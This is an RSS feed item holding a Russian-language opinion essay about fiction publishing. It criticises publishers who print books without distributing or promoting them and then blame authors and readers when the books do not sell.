						&lt;p&gt;Оглянитесь - как мало издают сегодня художественных книг. Отчего? Люди стали меньше&lt;br /&gt;читать? Тоже верно. Телевидение, кино, видео, компьютерные игры, поп-музыка - все это&lt;br /&gt;отрывает человека от книги. Но разве причина только в этом?&lt;/p&gt;
						&lt;p&gt;Отнюдь. Причина в том, что &amp;quot;испуганный агрессор&amp;quot; от книгоиздания слишком горячо&lt;br /&gt;обжегся на принципе &amp;quot;пипл хавает&amp;quot;. Я участвовал в работе над рядом книг, учебного&lt;br /&gt;плана, и попутно не мог не заинтересоваться тем, как обстоят дела у беллетристики.&lt;/p&gt;
						&lt;p&gt;Друзья, нормальный человек не поверит тому, что там происходит.&lt;/p&gt;
						&lt;p&gt;Ибо ничего нормального там нет.&lt;/p&gt;
						&lt;p&gt;Казалось бы. Есть книга, есть ее потенциальный читатель. Что должен сделать издатель?&lt;br /&gt;Донести книгу до читателя и получить с него большие деньги.&lt;/p&gt;
						&lt;p&gt;Ошибаетесь:&lt;/p&gt;
						&lt;p&gt;Издатель должен напечатать книгу и положить ее на склад. Если книгу не раскупят - что&lt;br /&gt;же, значит, она никуда не годится.&lt;/p&gt;
						&lt;p&gt;Глупо? Отнюдь. Так поступают большинство издателей, имеющих дело с беллетристикой. Я&lt;br /&gt;приведу вам пример нелепой сцены, которой сам был свидетелем.&lt;/p&gt;
						&lt;p&gt;Известно, что романы Д.Х.Чейза разошлись в нашей стране едва ли ни миллионными&lt;br /&gt;тиражами. Очевидно, это свидетельствует о его популярности. В одном из издательств я&lt;br /&gt;столкнулся с автором, который начинал как подражатель Чейзу. Со временем он стал&lt;br /&gt;писать все лучше, и вскоре превзошел своего учителя.&lt;/p&gt;
						&lt;p&gt;Это признают все - в том числе даже те издатели, которые отказываются его издавать.&lt;/p&gt;
						&lt;p&gt;Подключим логику. Чейз суперпопулярен. У нас есть автор, который пишет в том же ключе,&lt;br /&gt;но еще лучше. Станем издавать и получим много денег!&lt;/p&gt;
						&lt;p&gt;Но мы имеем дело с &amp;quot;перепуганным агрессором&amp;quot;, поэтому отключим логику.&lt;/p&gt;
						&lt;p&gt;Когда я принес в издательство очередной учебник, составленный сотрудниками&lt;br /&gt;университета, то столкнулся там с этим автором. У него тоже были две рукописи, и он&lt;br /&gt;пытался их протолкнуть.&lt;/p&gt;
						&lt;p&gt;- Простите, Семен Семенович! - говорил ему выпускающий редактор (имя прозаика я,&lt;br /&gt;конечно, меняю). - У вас замечательные детективы. Всем они нравятся. И нашему главному&lt;br /&gt;очень нравятся. Но видите ли - их не покупают!&lt;/p&gt;
						&lt;p&gt;- Помилуйте! - сокрушался автор. - Как же не покупают? Ни в одном магазине их нет.&lt;/p&gt;
						&lt;p&gt;Выпускающий редактор глубоко обиделся и принял суровый вид.&lt;/p&gt;
						&lt;p&gt;- Как это нет? - обвиняюще спросил он. - Вот, в этом же здании, что и издательство,&lt;br /&gt;есть лавочка. Там ваши книги и лежат. И никто не раскупает!&lt;/p&gt;
						&lt;p&gt;Казалось бы, дикая ситуация. Как сказал поэт, маразм крепчал. Для того чтобы книгу&lt;br /&gt;покупали, необходимо запустить ее в сеть магазинов, провести хотя бы минимальную&lt;br /&gt;рекламу - то есть, донести до читателя.&lt;/p&gt;
						&lt;p&gt;Во всей стране, по всему русскоязычному миру книга этого автора лежит только в одном&lt;br /&gt;маленьком магазинчике, под издательством. И редактор делает обоснованный вывод -&lt;br /&gt;читатели не хотят ее покупать! Вот если бы люди, со всей страны, приехали в этот&lt;br /&gt;магазинчик, да выстроились в очередь, распихивая друг друга, - вот тогда книга&lt;br /&gt;считалась бы &amp;quot;популярной&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Но донести книгу до читателя - это и значит &amp;quot;работать&amp;quot;, наш &amp;quot;испуганный агрессор&amp;quot;&lt;br /&gt;этого не умеет. Приведем еще пару примеров. Я очень люблю классический английский&lt;br /&gt;детектив, наподобие Колина Декстера (&amp;quot;Инспектор Морс&amp;quot;). Издательство &amp;quot;Армада&amp;quot;&lt;br /&gt;попыталось наладить выпуск книг этого автора. Серию закрыли, оттого, что ее &amp;quot;не&lt;br /&gt;покупали&amp;quot;.&lt;/p&gt;
						&lt;p&gt;А была ли у читателей такая возможность? Боюсь, что нет. С большим трудом я смог&lt;br /&gt;купить одну-единственную книгу на распродаже. Конечно, где-то они лежат - в таком же&lt;br /&gt;&amp;quot;магазинчике под издательством&amp;quot;, и читатели, видите ли, не желают их раскупать.&lt;/p&gt;
						&lt;p&gt;А серия романов Паркера о Спенсере? Классика черного романа. До моего города дошли&lt;br /&gt;только три книжки.&lt;/p&gt;
						&lt;p&gt;Все дело в том, что существует мейнстрим. Маринина, Дашкова - они отвечают вкусам&lt;br /&gt;большинства читателей, и слава Богу, что хотя бы им есть, что почитать. Подобных&lt;br /&gt;авторов можно просто издать и выбросить на полки. Как кидают воробьям крошки.&lt;/p&gt;
						&lt;p&gt;Но на страну не может быть сотни прозаиков такого жанра - нужны и другие. А ведь за&lt;br /&gt;пределами мейнстрима правило &amp;quot;пипл хавает&amp;quot; уже не срабатывает. Здесь нужно вести&lt;br /&gt;работу с читателями, серьезно изучать спрос, создавать сети распространителей...&lt;/p&gt;
						&lt;p&gt;К чему?&lt;/p&gt;
						&lt;p&gt;Для продажи Марининой это не надо. Значит, вообще не надо. И виноваты для &amp;quot;испуганного&lt;br /&gt;агрессора&amp;quot; все - и писатели, которые &amp;quot;плохо&amp;quot; пишут, и читатели, которые не желают&lt;br /&gt;читать.&lt;/p&gt;
						&lt;p&gt;Стоит ли удивляться, что тот выпускающий редактор, о котором шла речь немного выше,&lt;br /&gt;вскоре лишился своего места. А ведь у него было столько планов - настоящих, интересных&lt;br /&gt;планов. К примеру, он долго увлеченно рассказывал об идее составить лечебник от&lt;br /&gt;геморроя. Можно, конечно, улыбнуться такому замыслу - но ведь есть много людей,&lt;br /&gt;которым действительно нужны такие книги.&lt;/p&gt;
						&lt;p&gt;Вот почему наш &amp;quot;испуганный агрессор&amp;quot; так испуган. Он чувствует, что стул под ним&lt;br /&gt;шатается. Стул и будет шагаться - ибо все успехи нашего героя суть не успехи даже, а&lt;br /&gt;только удачи, рожденные стечением обстоятельств.&lt;/p&gt;
						&lt;p&gt;Стоит ситуации измениться, и он кувыркается со стула. И жаль его, ибо не сам он&lt;br /&gt;виноват в своем падении, и не жаль, ибо падение ничему не может его научить.&lt;/p&gt;
						&lt;p&gt;Зато оно может научить нас. Каждый совершает ошибки, и каждого искушает возможность&lt;br /&gt;спешить, лепя по принципу &amp;quot;так сойдет&amp;quot;. Но мы работаем не только ради денег и не&lt;br /&gt;только ради продвижения по службе.&lt;/p&gt;
						&lt;p&gt;Все это важно, все это чертовски важно, как сказала Баффи Корделии, после того как их&lt;br /&gt;чуть не убили, - но ни деньги, ни успех не имеют смысла, если потеряешь уважение к&lt;br /&gt;себе.&lt;/p&gt;
						&lt;p&gt;И даровать его может лишь хорошо выполненная работа.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Tue, 04 Aug 2009 16:48:43 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=15#p15</guid>
		</item>
	</channel>
</rss>
